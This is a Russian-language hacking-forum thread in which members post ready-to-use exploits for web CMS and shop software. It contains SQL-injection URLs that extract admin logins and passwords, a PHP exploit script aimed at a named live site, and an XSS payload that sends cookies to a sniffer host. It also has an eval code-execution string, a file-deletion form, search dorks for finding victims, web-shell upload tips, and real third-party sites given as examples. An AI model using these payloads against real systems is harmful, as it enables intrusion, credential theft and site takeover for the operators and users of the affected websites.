ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
09.09.2008, 15:07
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
E-phpscripts CMS Arya
Оф.сайт: ephpscripts.comДата: 09.09.08
Автор: ZAMUT
Дорк: inurl:article.php es_id
Описание:Уязвимость существует из-за недостаточной фильтрации входящего параметра, передаваемого через $_GET массив,
атакуещему позволяет провести SQL - инъекцию. Способы устранения уязвимости:проводить жесткую фильтрацию параметров перед передачей их в SQL - запрос.
Подробнее:Анти SQL-injection
Защита от SQL-injection Ограничения: Нету
Эксплоит:
PHP код:
/article.php?es_id=-1+union+select+1,concat_ws(0x3a,es_username,es_password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+esnm_admin/*&cid=2
Структура бд:
Код:
Table [information_schema]
Table [VIEWS]
TABLE_SCHEMA
TABLE_NAME
VIEW_DEFINITION
CHECK_OPTION
IS_UPDATABLE
DEFINER
SECURITY_TYPE
Table [alpinein_cmsalpine]
Table [es_country]
id
Table [esnm_admin]
es_username
es_password
es_level
es_blocked
Table [esnm_announcements]
es_text
es_type
es_temp
es_postedon
Table [esnm_articles]
es_title
es_sum
es_desc
es_img
es_hide
tempdate
es_date
es_postedon
es_modifiedon
es_uid
es_cid
es_top_banner
es_left_banner
es_order_index
Table [esnm_categories]
es_cat_name
es_pid
es_status
es_cat_description
es_top_banner
es_left_banner
es_order_index
Table [esnm_config]
es_site_name
es_site_root
es_html_header
es_html_footer
es_recperpage
es_image_size
es_site_keywords
es_thumb_size
es_mem_approval
es_signup_verification
es_null_char
es_admin_email
es_logincheck
es_welcome_msg
es_general_notice
Table [esnm_country]
id
Table [esnm_events]
es_title
es_desc
tempdate
es_postedon
es_approved
es_featured
Table [esnm_feedback]
es_fname
es_lname
es_email
es_url
es_title
es_comments
Table [esnm_form_fields]
es_type
es_name
es_label
es_int_value
es_req
es_display
es_width
es_num_lines
es_is_num
es_formid
es_order_index
Table [esnm_forms]
es_title
es_submit_mail
Table [esnm_front_cats]
es_cid
es_show_desc
es_rec
es_order
Table [esnm_mails]
es_mailid
es_fromid
es_title
es_subject
es_mail
es_status
es_html_format
Table [esnm_members]
es_username
es_password
es_label
es_firstname
es_lastname
es_email
es_street
es_city
es_state
es_zip
es_country
tempdate
es_ondate
es_lastlogin
es_suspended
es_phone
es_mobile
es_paid
es_general_notice
Table [esnm_pages]
es_title
es_contents
es_top_banner
es_left_banner
Table [esnm_signups]
es_rnum
es_email
es_onstamp
Table [esnm_subscribers]
es_name
es_email
Table [esnm_subscribers1]
es_name
es_email
Table [esnm_testimonials]
es_desc
es_from
tempdate
es_postedon
Пример:
Код:
prescare.org.au/article.php?es_id=-1+union+select+1,concat_ws(0x3a,es_username,es_password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+esnm_admin/*&cid=2
__________________
в строю
|
|
|
30.09.2008, 19:14
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
InterTech WCMS SQL-injection Exploit
Оф.сайт: intertech-pal.comДата: 30.09.08
Первоисточник: http://www.securitylab.ru/vulnerability/360260.php (эксплоита нет)
Дорк: "Designed by: InterTech Co" id
Описание:Уязвимость существует из-за недостаточной (или ее отсутствии вовсе) фильтрации входящего параметра, передаваемого через $_GET массив,
атакуещему позволяет провести SQL - инъекцию. Способы устранения уязвимости:проводить жесткую фильтрацию параметров перед передачей их в SQL - запрос.
Подробнее:Анти SQL-injection
Защита от SQL-injection Ограничения: Нету
Эксплоит:
PHP код:
<?php
// Coded by ZAMUT
$host = 'www.intertech-pal.com'; # Сайт
$path = '/panorama2/'; # Путь до скрипта
$port = 80; # Порт
echo "Exploiting $host<br><br>";
$sock = fsockopen($host,$port);
if(!$sock)die("failed\n"); else echo "Connecting $host .. -OK<br><br>";
$packet = "GET http://{$host}{$path}etemplate.php?id=-1+union+select+1,2,3,concat(0x3a3a3a,username,0x3a,password,0x3a3a3a),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users+limit+0,1/* HTTP/1.0\r\n";
$packet.= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,";
$packet.= "application/x-shockwave-flash, application/vnd.ms-excel, application/msword, */*\r\n";
$packet.= "Accept-Language: ru\r\n";
$packet.= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.= "Proxy-Connection: Keep-Alive\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Connection: close\r\n\r\n";
fputs($sock,$packet);
while(!feof($sock))
{
$resp.=fgets($sock,512);
if(preg_match("/:::(.+):::/",$resp,$m)){ break; }
}
fclose($sock);
echo "Data (Username, password):<br>";
echo "$m[1]<br>";
?>
|
|
|
|
08.11.2008, 11:05
|
|
Познающий
Регистрация: 01.08.2008
Сообщений: 42
Провел на форуме:
670601
Репутация:
50
|
|
Xpoz SQL-INJECTION, XSS
с этим адвайсом получилась странная история - после отправки строку на милворм, через 2 дня я увидел его(в урезанном виде) на милворме, но авторство принадлежало каким-то непонятным хенкерам, на что str0ke только развел руками и сказал что они прислали на день раньше.  ну да не важно, все-таки выложу здесь.
================================================== ==============================
|| Xpoz SQL-INJECTION, XSS
================================================== ==============================
Application: Xpoz PRO (Expoze Photo Store)
Website: http://xpoze.org
Version: All(current 1.0)
About: Xpoze is a photo store very easy to use, yet having lots of features to help buyers and sellers to find or sell images after their needs.
Googledork: Powered by Powered by Xpoze.org
Date: 01-07-2008
Description:
Множественные уязвимости типа SQL-injection, Blind-injection, активные и пассивные XSS.
[ SQL-INJECTION ]
some...
http://host/home.html?menu=1[SQL]
http://host/user.html?uid=1[SQL]
http://host/account/admin/edite.html?eid=1[SQL]
http://host/video.html?limiter=0&c=1[SQL]
And other vulnerable files:
---------------------------
// $p=[admin, editor, user, photo]
[ members/$p/edite.inc ]
PHP код:
12: if (isset($delete)) { $ph = mysql_query("SELECT * FROM `photos` WHERE `id`='$delete'") or die(mysql_error()); $row = mysql_fetch_assoc($ph); $url = "../photos/".$row['photo']; $thumb_url = "../thumbs/".$row['photo']; 18: mysql_query("DELETE from `photos` WHERE `id`='$delete'") or die(mysql_error());
187(171 or 163): $ph = mysql_query("SELECT * FROM `photos` WHERE `hash`='$hash'") or die(mysql_error());
[ members/$p/editp.inc ]
PHP код:
$sql = mysql_query("SELECT * FROM `photos` WHERE `id`='$pid'") or die(mysql_error());
[ include/img.rating.php ]
PHP код:
$rat = mysql_query("SELECT * FROM `ratings` WHERE `photo`='$id'") or die(mysql_error()); $rates = mysql_num_rows($rat);
ETC...
===>>> Exploit:
http://host/user.html?uid=-1%20union%20select%201,user,1,1,1,pass,1,1,1,1,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20 users%20limit%203,1/*
(!) Пароль в БД в открытом виде (!)
[ ACTIVE XSS ]
В форуме отсутствует фильтрация полей темы и сообщения.
===>>> Exploit:
<script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script>
[ PASSIVE XSS  ]
http://host/?tpl=[XSS]
PHPInfo - http://host/info.php |
|
|
|
15.12.2008, 15:02
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
Absolute shopping cart
Сайт: http://www.absoluteshoppingcart.co.uk
Цена: от £19.99
------
SQL-Injection
http://victim.com/latest_detail.asp?prod_id=147&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8, 9/*
prod_id должен быть реальным..
|
|
|
|
23.12.2008, 16:56
|
|
Новичок
Регистрация: 12.11.2008
Сообщений: 5
Провел на форуме:
50575
Репутация:
20
|
|
shop-script 1.24
shop-script 1.24 скрипт - один из самых распрастраненых движков интернет магазина. сейчас сняли с продажи, так как запустили новый скрипт. но shop-script 'ом все еще активно пользуются и не спешат переходить на новый продукт.
magic_quotes_gpc = OFF
Sql Injection:
проверка на уязвимость:
PHP код:
http://fanataudio.ru/cart.php?add2cart=120000%23'+OR+ascii(substring((select+Login+from+SS_customers+where+customerID%3D1)%2C1%2C1))>0+and+''%3D'
если товар (любой) добавился то сайт уязвим
уязвимая переменная add2cart
так как поля не выводятся то вытащить пароль админа можно перебором по буковке.
пароль зашифрован base64 тоесть открыт
логин не зашифрован, в 99.9% админ это юсер с customerID=1
и в 80% его логин admin
google: inurl:"index.php?feedback=yes"
примерно 1500 сайтов
приведен реальный пример уязвимого сайта
кстати для тех кто взламал логин/пароль магазина: добавить шелл можно через добавление нового товара. просто указываете что товар является програмой. в путь выбираете любой файл шелла
не забудьте перед тем как добавить шелл залить файл .htaccess со значением Allow from all |
|
|
|
Post Affiliate Pro <=3.0.6 Code Execution |
05.01.2009, 19:01
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Post Affiliate Pro <=3.0.6 Code Execution
Post Affiliate Pro
Версия: 3.0.6 и более ранние
Дорк: inurl:affiliates intext:"version 3.0." "generated in" "DB Requests"
Уязвимый код:
/affiliate/include/Affiliate/Merchants/Views/ResourceBrowser.class.php:
PHP код:
function process() {
if(!empty($_REQUEST['action'])) {
switch($_REQUEST['action']) {
case 'addheader':
$this->processAddHeader();
break;
/**/
}
}
PHP код:
function processAddHeader() {
if($_REQUEST['commited'] == 'yes') {
$name = $_REQUEST['header_name'];
$caption = $_REQUEST['header_caption'];
if(!empty($name) && !empty($caption)) {
$this->menu->createMenuHeader($name, $caption);
$this->menu->save();
return true;
} /**/
}
/affiliate/include/QUnit/UI/Menu.class.php
PHP код:
function createMenuHeader($name, $caption) {
if($caption != '') eval("\$caption = $caption;");
/**/
}
Эксплоит:
/affiliate/merchants/styles.php?md=Affiliate_Merchants_Views_ResourceBr owser&action=addheader&commited=yes&header_name=lo lol&header_caption=phpinfo()
|
|
|
|
11.01.2009, 02:32
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
Citrix NetScaler v.7
Уязвимый Файл: generic_api_call.pl
XSS:
Код:
http://site/ws/generic_api_call.pl?function=statns&stan
dalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e
Последний раз редактировалось baltazar; 11.01.2009 в 02:35..
|
|
|
|
11.01.2009, 21:39
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
Продукт: ArticleLive (Interspire Website Publisher)
Версия: NX.1.7.1.2(возможно и более ранние версии)
Веб-сайт разработчика:http://www.interspire.com/
Цена:$249
Уязвимый скрипт:blogs.php?id={SQL-injection}
Пример:
Код:
http://www.journalismproject.ca/english_new/blogs.php?id=-768+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,144,15,16,17,18,19,20,21,22,23,24,25,26,27+from+ArticleLive_users+limit+0,1--
(c) IceAngel_
Последний раз редактировалось Iceangel_; 11.01.2009 в 21:46..
|
|
|
|
15.01.2009, 08:27
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
DMXReady Scripts http://www.dmxready.com
Уязвимость: Remote Files Delete Vulnerability
Продукт: DMXReady Blog Manager <= 1.1
Цена: 199.97 $
Dork : inurl:inc_webblogmanager.asp
PHP код:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>ajann Exp</title>
</head>
<body>
<p>Delete File : )</p>
<p>Form Action: http://target/[path]/includes/shared_scripts/wysiwyg_editor/assetmanager/assetmanager.asp?ffilter=</p>
<form id="form1" name="form1" method="post" action="http://target/[path]/includes/shared_scripts/wysiwyg_editor/assetmanager/assetmanager.asp?ffilter=">
<label>
<input type="hidden" name="inpCurrFolder" value="" />
</label>
<p>
<label>
Delete File Path:
<input type="text" name="inpFileToDelete" value="/shots/index.asp">
</label>
etc..
</p>
<p>
<label>
<input type="submit" name="ff" id="ff" value="Submit" />
</label>
</p>
</form>
<p><br />
</p>
</body>
</html>
Уязвимость: Contents Change Vulnerability
Продукт: DMXReady PayPal Store Manager <= 1.1
Цена: 129.97 $
Dork: inurl:inc_paypalstoremanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload
You Find -> http://[target]/[path]//applications/PayPalStoreManager/inc_paypalstoremanager.asp
Edit -> http://[target]/[path]//admin/PayPalStoreManager/CategoryManager/list.asp
Продукт: DMXReady Photo Gallery Manager <= 1.1
Цена: 39.97 $
Dork: inurl:inc_photogallerymanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload
You Find -> http://[target]/[path]//applications/PhotoGalleryManager/inc_photogallerymanager.asp
Edit -> http://[target]/[path]//admin/PhotoGalleryManager/add_category.asp
Продукт: DMXReady Registration Manager <= 1.1
Цена: 49.97 $
Dork: inurl:inc_registrationmanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
You Find -> http://[target]/[path]//applications/RegistrationManager/inc_registrationmanager.asp
Edit -> http://[target]/[path]//admin/RegistrationManager/add_category.asp
Продукт: DMXReady BillboardManager <= 1.1
Цена: 49.97 $
Permissions:
Update
Delete
Insert Category / Sub Category
You Find -> http://[target]/[path]//applications/BillboardManager/
Edit ->
http://www.demo.dmxready.com/admin/BillboardManager/add_category.asp
Уязвимость: Remote Contents Change Vulnerability
Продукт: DMXReady Catalog Manager <= 1.1
Цена: 149.97 $
Dork: inurl:inc_catalogmanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
You Find -> http://[target]/[path]//applications/RegistrationManager/inc_registrationmanager.asp
Edit -> http://[target]/[path]//admin/RegistrationManager/add_category.asp
Продукт: DMXReady Contact Us Manager <= 1.1
Цена: 49.97 $
Dork: inurl:inc_contactusmanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload
You Find -> http://[target]/[path]//applications/ContactUsManager/inc_contactusmanager.asp
Edit -> http://[target]/[path]//admin/ContactUsManager/add_category.asp
Продукт: DMXReady Document Library Manager <= 1.1
Цена: 39.97 $
Dork: inurl:inc_documentlibrarymanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload
You Find -> http://[target]/[path]//applications/DocumentLibraryManager/inc_documentlibrarymanager.asp
Edit -> http://[target]/[path]//admin/DocumentLibraryManager/add_category.asp
Продукт: DMXReady Faqs Manager <= 1.1
Цена: 24.97 $
Dork: inurl:inc_faqsmanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload
You Find -> http://[target]/[path]//applications/FaqsManager/inc_faqsmanager.asp
Edit -> http://[target]/[path]//admin/FaqsManager/add_category.asp
Продукт: DMXReady Job Listing <= 1.1
Цена: 49.97 $
Dork: inurl:inc_joblistingmanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload
You Find -> http://[target]/[path]//applications/JobListingManager/inc_joblistingmanager.asp
Edit -> http://[target]/[path]//admin/JobListingManager/CategoryManager/list.asp
Продукт: DMXReady Links Manager <= 1.1
Цена: 24.97 $
Dork: inurl:inc_linksmanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
You Find -> http://[target]/[path]//applications/LinksManager/inc_linksmanager.asp
Edit -> http://[target]/[path]//admin/LinksManager/add_category.asp
Уязвимость: SQL Injection Vulnerability
Продукт: DMXReady Classified Listings Manager <= 1.1
Цена: 99.97 $
Dork: inurl:inc_classifiedlistingsmanager.asp
Admin Login: http://[target]/[path]//admin/ClassifiedListingsManager/manage.asp
USERNAME->
Код:
http://[target]/[path]/admin/ClassifiedListingsManager/components/CategoryManager/upload_image_category.asp?cid=5 union select 0,Security_AdminUserName,2,5,9,3 from tblCLM_config
PASSWORD->
Код:
http://[target]/[path]///admin/ClassifiedListingsManager/components/CategoryManager/upload_image_category.asp?cid=5 union select 0,Security_AdminPassword,2,5,9,3 from tblCLM_config
Продукт: DMXReady Member Directory Manager <= 1.1
Цена:99.97 $
Dork: inurl:inc_memberdirectorymanager.asp
Admin Login: http://[target]/[path]/admin/MemberDirectoryManager/admin.asp
USERNAME->
Код:
http://[target]/[path]/admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=-1231312 union select 6,Security_AdminUserName,4,3,2,1 from tblMDM_config
PASSWORD->
Код:
http://[target]/[path]/admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=-1231312 union select 6,Security_AdminPassword,4,3,2,1 from tblMDM_config
Продукт: DMXReady Members Area Manager <= 1.2
Цена: 149.97 $
Dork: inurl:inc_membersareamanager.asp
Admin Login: http://[target]/[path]/admin/MembersAreaManager/admin.asp
USERNAME->
Код:
http://[target]/[path]/admin/MembersAreaManager/components/SecurityLevelManager/upload_image_security_level.asp?cid=-12312312 union select 1,Security_AdminUserName,3,4,5,6 from tblConfig
PASSWORD->
Код:
http://[target]/[path]/admin/MembersAreaManager/components/SecurityLevelManager/upload_image_security_level.asp?cid=-12312312 union select 1,Security_AdminPassword,3,4,5,6 from tblConfig
Продукт: DMXReady SDK <= 1.1
Уязвимость: Remote File Download Vulnerability
Цена:389.97 $
Код:
http://[target]/path/control_panel/download_link.asp?filename=inc_faqsmanager_qs_jump_menu.asp&filelocation={FILE PATH}
Продукт: DMXReady Secure Document Library <= 1.1
Уязвимость: Remote SQL Injection Vulnerability
Цена:189.97 $
Admin Login:http://[target]/[path]/admin/SecureDocumentLibrary/admin.asp
USERNAME->
Код:
http://[target]/[path]/admin/SecureDocumentLibrary/MembersAreaManager/components/CategoryManager/upload_image_category.asp?cid=-12321 union select 2,Security_AdminPassword,4,5,6,0 from tblConfig
PASSWORD->
Код:
http://[target]/[path]/admin/SecureDocumentLibrary/MembersAreaManager/components/CategoryManager/upload_image_category.asp?cid=-12321 union select 2,Security_AdminPassword,4,5,6,0 from tblConfig
Продукт: DMXReady Billboard Manager <= 1.1
Уязвимость: Remote File Upload Vulnerability
Цена:49.97 $
Dork: inurl:inc_billboardmanager.asp?ItemID=
# http://[target]/[path]/admin/BillboardManager/upload_document.asp?ItemID=[ItemID]
ItemID= 1,2,3,4,5.......
Example:
You Find -> http://[target]/[path]//applications/BillboardManager/inc_billboardmanager.asp
Edit -> http://[target]/[path]//admin/BillboardManager/upload_document.asp?ItemID=[ItemID]
DMXReady BillboardManager <= 1.1 Contents Change Vulnerability find by x0r
all other vulnerability found by ajann
Последний раз редактировалось z00MAN; 15.01.2009 в 21:18..
|
|
|
|
01.03.2009, 07:23
|
|
Познающий
Регистрация: 11.09.2008
Сообщений: 99
Провел на форуме:
2753780
Репутация:
585
|
|
S.Builder CMS RFI/LFI
Сайт разработчика: http://www.sbuilder.ru
Уязвимые версии: тестировалось на версии 3.7, но, вероятно, уязвимость присутствует и в следующих версиях.
Описание:
Движок этой cms создает файлы сайта (index.php, etc) с кодом вида:
Код:
<?php if (!isset($GLOBALS['binn_include_path'])) $GLOBALS['binn_include_path'] = ''; ?>
// ...
<?php
include_once($GLOBALS['binn_include_path'].'prog/pl_menu/show_menu.php');
// ...
?>
// ...
При register_globals = On, можно записать собственный путь в переменную binn_include_path, и провести атаку LFI или RFI (при allow_url_fopen=On), в случае с LFI, отрезав добавляемый в include_once() путь при помощи null-byte или php path truncation attack.
Последний раз редактировалось cr0w; 01.03.2009 в 12:47..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1037370){kind=avatar}
![Отправить сообщение для [Raz0r] с помощью ICQ](fusion/misc/im_icq.gif)
Похожие темы
Линейный вид
